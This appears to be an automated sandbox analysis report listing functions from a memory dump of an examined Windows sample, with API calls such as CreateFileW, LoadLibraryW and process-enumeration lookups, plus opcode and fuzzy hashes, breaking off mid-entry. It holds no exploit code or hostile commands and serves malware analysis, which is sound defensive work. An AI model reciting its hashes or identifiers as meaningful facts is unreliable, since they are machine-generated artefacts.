                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2445788494-0
                                                                                                                                                                                    • Opcode ID: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                                                                                                                                                                                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                    • Opcode Fuzzy Hash: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                    Function 004152C7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: malloc
                                                                                                                                                                                    • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                    • API String ID: 2803490479-1168259600
                                                                                                                                                                                    • Opcode ID: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                                                                                                                                                                                    • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                                                                                                                    Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0041BDDF
                                                                                                                                                                                    • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmpmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1065087418-0
                                                                                                                                                                                    • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                                                                                                    • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                    • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                    Function 00406C5A Relevance: 2.7, APIs: 2, Instructions: 184COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,?,?,00000000,?,?,00000001,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00406E5A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$??2@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3700833809-0
                                                                                                                                                                                    • Opcode ID: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
                                                                                                                                                                                    • Instruction ID: 3357a4f00022c45c5c3ded2ab4a10c96e173cb442a6a42c74f6c45d37007c03c
                                                                                                                                                                                    • Opcode Fuzzy Hash: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
                                                                                                                                                                                    • Instruction Fuzzy Hash: EE7117B1E00219EBCB04DFA9D8949EEB7B5FF08304F11802EF916A7281D7789951CB64
                                                                                                                                                                                    Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                      • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                                                                                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                      • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1381354015-0
                                                                                                                                                                                    • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                                                                                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                    • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                                                                                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                    Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004301AD
                                                                                                                                                                                    • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1297977491-0
                                                                                                                                                                                    • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                                                                                    • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                                                                                    • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                    Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                    • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                    • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                    Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                      • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2154303073-0
                                                                                                                                                                                    • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                                                                                                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                    • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                    Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3150196962-0
                                                                                                                                                                                    • Opcode ID: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                                                                                                                                                                                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                    • Opcode Fuzzy Hash: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                    Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$PointerRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3154509469-0
                                                                                                                                                                                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                    Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4232544981-0
                                                                                                                                                                                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                    Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                    Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$FileModuleName
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3859505661-0
                                                                                                                                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                    Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                    Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                    Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                                                                                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                    Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                    Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
